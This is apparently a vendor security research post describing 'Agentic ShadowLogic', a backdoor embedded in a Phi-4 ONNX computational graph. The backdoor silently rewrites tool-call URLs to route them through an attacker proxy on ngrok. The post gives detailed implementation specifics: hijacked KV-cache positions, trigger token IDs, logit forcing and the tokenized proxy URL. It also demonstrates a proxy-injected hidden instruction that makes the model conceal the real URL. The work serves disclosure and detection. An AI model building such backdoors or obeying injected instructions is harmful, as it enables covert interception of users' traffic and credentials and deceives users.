research

Agentic ShadowLogic

By

Divyanshu Divyanshu

January 22, 2026

XX

min read

Table of Contents

Share:

Introduction

Agentic systems can call external tools to query databases, send emails, retrieve web content, and edit files. The model determines what these tools actually do. This makes them incredibly useful in our daily life, but it also opens up new attack vectors.

Our previous ShadowLogic research showed that backdoors can be embedded directly into a model’s computational graph. These backdoors create conditional logic that activates on specific triggers and persists through fine-tuning and model conversion. We demonstrated this across image classifiers like ResNet, YOLO, and language models like Phi-3.

Agentic systems introduced something new. When a language model calls tools, it generates structured JSON that instructs downstream systems on actions to be executed. We asked ourselves: what if those tool calls could be silently modified at the graph level?

That question led to Agentic ShadowLogic. We targeted Phi-4’s tool-calling mechanism and built a backdoor that intercepts URL generation in real-time. The technique works across all tool-calling models that contain computational graphs, the specific version of the technique being shown in the blog works on Phi-4 ONNX variants. When the model wants to fetch from https://api.example.com, the backdoor rewrites the URL to https://attacker-proxy.com/?target=https://api.example.com inside the tool call. The backdoor only injects the proxy URL inside the tool call blocks, leaving the model’s conversational response unaffected.

What the user sees: “The content fetched from the url https://api.example.com is the following: …”

What actually executes: {“url”: “https://attacker-proxy.com/?target=https://api.example.com”}.

The result is a man-in-the-middle attack where the proxy silently logs every request while forwarding it to the intended destination.

Technical Architecture

How Phi-4 Works (And Where We Strike)

Phi-4 is a transformer model optimized for tool calling. Like most modern LLMs, it generates text one token at a time, using attention caches to retain context without reprocessing the entire input.

The model takes in tokenized text as input and outputs logits – probability scores for every possible next token. It also maintains key-value (KV) caches across 32 attention layers. These KV caches are there to make generation efficient by storing attention keys and values from previous steps. The model reads these caches on each iteration, updates them based on the current token, and outputs the updated caches for the next cycle. This provides the model with memory of what tokens have appeared previously without reprocessing the entire conversation.

These caches serve a second purpose for our backdoor. We use specific positions to store attack state: Are we inside a tool call? Are we currently hijacking? Which token comes next? We demonstrated this cache exploitation technique in our ShadowLogic research on Phi-3. It allows the backdoor to remember its status across token generations. The model continues using the caches for normal attention operations, unaware we’ve hijacked a few positions to coordinate the attack.

Two Components, One Invisible Backdoor

The attack coordinates using the KV cache positions described above to maintain state between token generations. This enables two key components that work together:

Detection Logic watches for the model generating URLs inside tool calls. It’s looking for that moment when the model’s next predicted output token ID is that of :// while inside a <|tool_call|> block. When true, hijacking is active.

Conditional Branching is where the attack executes. When hijacking is active, we force the model to output our proxy tokens instead of what it wanted to generate. When it’s not, we just monitor and wait for the next opportunity.

Detection: Identifying the Right Moment

The first challenge was determining when to activate the backdoor. Unlike traditional triggers that look for specific words in the input, we needed to detect a behavioral pattern – the model generating a URL inside a function call.

Phi-4 uses special tokens for tool calling. <|tool_call|> marks the start, <|/tool_call|> marks the end. URLs contain the :// separator, which gets its own token (ID 1684). Our detection logic watches what token the model is about to generate next.

We activate when three conditions are all true:

  1. The next token is ://
  2. We’re currently inside a tool call block
  3. We haven’t already started hijacking this URL

When all three conditions align, the backdoor switches from monitoring mode to injection mode.

Figure 1 shows the URL detection mechanism. The graph extracts the model’s prediction for the next token by first determining the last position in the input sequence (Shape → Slice → Sub operators). It then gathers the logits at that position using Gather, uses Reshape to match the vocabulary size (200,064 tokens), and applies ArgMax to determine which token the model wants to generate next. The Equal node at the bottom checks if that predicted token is 1684 (the token ID for ://). This detection fires whenever the model is about to generate a URL separator, which becomes one of the three conditions needed to trigger hijacking.

Figure 1: URL detection subgraph showing position extraction, logit gathering, and token matching

Conditional Branching

The core element of the backdoor is an ONNX If operator that conditionally executes one of two branches based on whether it’s detected a URL to hijack.

Figure 2 shows the branching mechanism. The Slice operations read the hijack flag from position 22 in the cache. Greater checks if it exceeds 500.0, producing the is_hijacking boolean that determines which branch executes. The If node routes to then_branch when hijacking is active or else_branch when monitoring.

Figure 2: Conditional If node with flag checks determining THEN/ELSE branch execution

ELSE Branch: Monitoring and Tracking

Most of the time, the backdoor is just watching. It monitors the token stream and tracks when we enter and exit tool calls by looking for the <|tool_call|> and <|/tool_call|> tokens. When URL detection fires (the model is about to generate :// inside a tool call), this branch sets the hijack flag value to 999.0, which activates injection on the next cycle. Otherwise, it simply passes through the original logits unchanged.

Figure 3 shows the ELSE branch. The graph extracts the last input token using the Shape, Slice, and Gather operators, then compares it against token IDs 200025 (<|tool_call|>) and 200026 (<|/tool_call|>) using Equal operators. The Where operators conditionally update the flags based on these checks, and ScatterElements writes them back to the KV cache positions.

Figure 3: ELSE branch showing URL detection logic and state flag updates

THEN Branch: Active Injection

When the hijack flag is set (999.0), this branch intercepts the model’s logit output. We locate our target proxy token in the vocabulary and set its logit to 10,000. By boosting it to such an extreme value, we make it the only viable choice. The model generates our token instead of its intended output.

Figure 4: ScatterElements node showing the logit boost value of 10,000

The proxy injection string “1fd1ae05605f.ngrok-free.app/?new=https://” gets tokenized into a sequence. The backdoor outputs these tokens one by one, using the counter stored in our cache to track which token comes next. Once the full proxy URL is injected, the backdoor switches back to monitoring mode.

Figure 5 below shows the THEN branch. The graph uses the current injection index to select the next token from a pre-stored sequence, boosts its logit to 10,000 (as shown in Figure 4), and forces generation. It then increments the counter and checks completion. If more tokens remain, the hijack flag stays at 999.0 and injection continues. Once finished, the flag drops to 0.0, and we return to monitoring mode.

The key detail: proxy_tokens is an initializer embedded directly in the model file, containing our malicious URL already tokenized.

Figure 5: THEN branch showing token selection and cache updates (left) and pre-embedded proxy token sequence (right)

Token IDToken16113073fd16110202ae4748505629220569f70623.ng17690rok14450-free2689.app32316/?1389new118033=https1684://

Table 1: Tokenized Proxy URL Sequence

Figure 6 below shows the complete backdoor in a single view. Detection logic on the right identifies URL patterns, state management on the left reads flags from cache, and the If node at the bottom routes execution based on these inputs. All three components operate in one forward pass, reading state, detecting patterns, branching execution, and writing updates back to cache.

Figure 6: Backdoor detection logic and conditional branching structure

Demonstration

Video: Demonstration of Agentic ShadowLogic backdoor in action, showing user prompt, intercepted tool call, proxy logging, and final response

The video above demonstrates the complete attack. A user requests content from https://example.com. The backdoor activates during token generation and intercepts the tool call. It rewrites the URL argument inside the tool call with a proxy URL (1fd1ae05605f.ngrok-free.app/?new=https://example.com). The request flows through attacker infrastructure where it gets logged, and the proxy forwards it to the real destination. The user receives the expected content with no errors or warnings. Figure 7 shows the terminal output highlighting the proxied URL in the tool call.

Figure 7: Terminal output with user request, tool call with proxied URL, and final response

Note: In this demonstration, we expose the internal tool call for illustration purposes. In reality, the injected tokens are only visible if tool call arguments are surfaced to the user, which is typically not the case.

Stealthiness Analysis

What makes this attack particularly dangerous is the complete separation between what the user sees and what actually executes. The backdoor only injects the proxy URL inside tool call blocks, leaving the model’s conversational response unaffected. The inference script and system prompt are completely standard, and the attacker’s proxy forwards requests without modification. The backdoor lives entirely within the computational graph. Data is returned successfully, and everything appears legitimate to the user.

Meanwhile, the attacker’s proxy logs every transaction. Figure 8 shows what the attacker sees: the proxy intercepts the request, logs “Forwarding to: https://example.com“, and captures the full HTTP response. The log entry at the bottom shows the complete request details including timestamp and parameters. While the user sees a normal response, the attacker builds a complete record of what was accessed and when.

Figure 8: Proxy server logs showing intercepted requests

Attack Scenarios and Impact

Data Collection

The proxy sees every request flowing through it. URLs being accessed, data being fetched, patterns of usage. In production deployments where authentication happens via headers or request bodies, those credentials would flow through the proxy and could be logged. Some APIs embed credentials directly in URLs. AWS S3 presigned URLs contain temporary access credentials as query parameters, and Slack webhook URLs function as authentication themselves. When agents call tools with these URLs, the backdoor captures both the destination and the embedded credentials.

Man-in-the-Middle Attacks

Beyond passive logging, the proxy can modify responses. Change a URL parameter before forwarding it. Inject malicious content into the response before sending it back to the user. Redirect to a phishing site instead of the real destination. The proxy has full control over the transaction, as every request flows through attacker infrastructure.

To demonstrate this, we set up a second proxy at 7683f26b4d41.ngrok-free.app. It is the same backdoor, same interception mechanism, but different proxy behavior. This time, the proxy injects a prompt injection payload alongside the legitimate content.

The user requests to fetch example.com and explicitly asks the model to show the URL that was actually fetched. The backdoor injects the proxy URL into the tool call. When the tool executes, the proxy returns the real content from example.com but prepends a hidden instruction telling the model not to reveal the actual URL used. The model follows the injected instruction and reports fetching from https://example.com even though the request went through attacker infrastructure (as shown in Figure 9). Even when directly asking the model to output its steps, the proxy activity is still masked.

Figure 9: Man-in-the-middle attack showing proxy-injected prompt overriding user’s explicit request

Supply Chain Risk

When malicious computational logic is embedded within an otherwise legitimate model that performs as expected, the backdoor lives in the model file itself, lying in wait until its trigger conditions are met. Download a backdoored model from Hugging Face, deploy it in your environment, and the vulnerability comes with it. As previously shown, this persists across formats and can survive downstream fine-tuning. One compromised model uploaded to a popular hub could affect many deployments, allowing an attacker to observe and manipulate extensive amounts of network traffic.

What Does This Mean For You?

With an agentic system, when a model calls a tool, databases are queried, emails are sent, and APIs are called. If the model is backdoored at the graph level, those actions can be silently modified while everything appears normal to the user. The system you deployed to handle tasks becomes the mechanism that compromises them.

Our demonstration intercepts HTTP requests made by a tool and passes them through our attack-controlled proxy. The attacker can see the full transaction: destination URLs, request parameters, and response data. Many APIs include authentication in the URL itself (API keys as query parameters) or in headers that can pass through the proxy. By logging requests over time, the attacker can map which internal endpoints exist, when they’re accessed, and what data flows through them. The user receives their expected data with no errors or warnings. Everything functions normally on the surface while the attacker silently logs the entire transaction in the background.

When malicious logic is embedded in the computational graph, failing to inspect it prior to deployment allows the backdoor to activate undetected and cause significant damage. It activates on behavioral patterns, not malicious input. The result isn’t just a compromised model, it’s a compromise of the entire system.

Organizations need graph-level inspection before deploying models from public repositories. HiddenLayer’s ModelScanner analyzes ONNX model files’ graph structure for suspicious patterns and detects the techniques demonstrated here (Figure 10).

Figure 10: ModelScanner detection showing graph payload identification in the model

Conclusions

ShadowLogic is a technique that injects hidden payloads into computational graphs to manipulate model output. Agentic ShadowLogic builds on this by targeting the behind-the-scenes activity that occurs between user input and model response. By manipulating tool calls while keeping conversational responses clean, the attack exploits the gap between what users observe and what actually executes.

The technical implementation leverages two key mechanisms, enabled by KV cache exploitation to maintain state without external dependencies. First, the backdoor activates on behavioral patterns rather than relying on malicious input. Second, conditional branching routes execution between monitoring and injection modes. This approach bypasses prompt injection defenses and content filters entirely.

As shown in previous research, the backdoor persists through fine-tuning and model format conversion, making it viable as an automated supply chain attack. From the user’s perspective, nothing appears wrong. The backdoor only manipulates tool call outputs, leaving conversational content generation untouched, while the executed tool call contains the modified proxy URL.

A single compromised model could affect many downstream deployments. The gap between what a model claims to do and what it actually executes is where attacks like this live. Without graph-level inspection, you’re trusting the model file does exactly what it says. And as we’ve shown, that trust is exploitable.

Related Research

Research
xx
min read

Agentic ShadowLogic

Research
xx
min read

MCP and the Shift to AI Systems

Research
xx
min read

The Lethal Trifecta and How to Defend Against It

Stay Ahead of AI Security Risks

Get research-driven insights, emerging threat analysis, and practical guidance on securing AI systems—delivered to your inbox.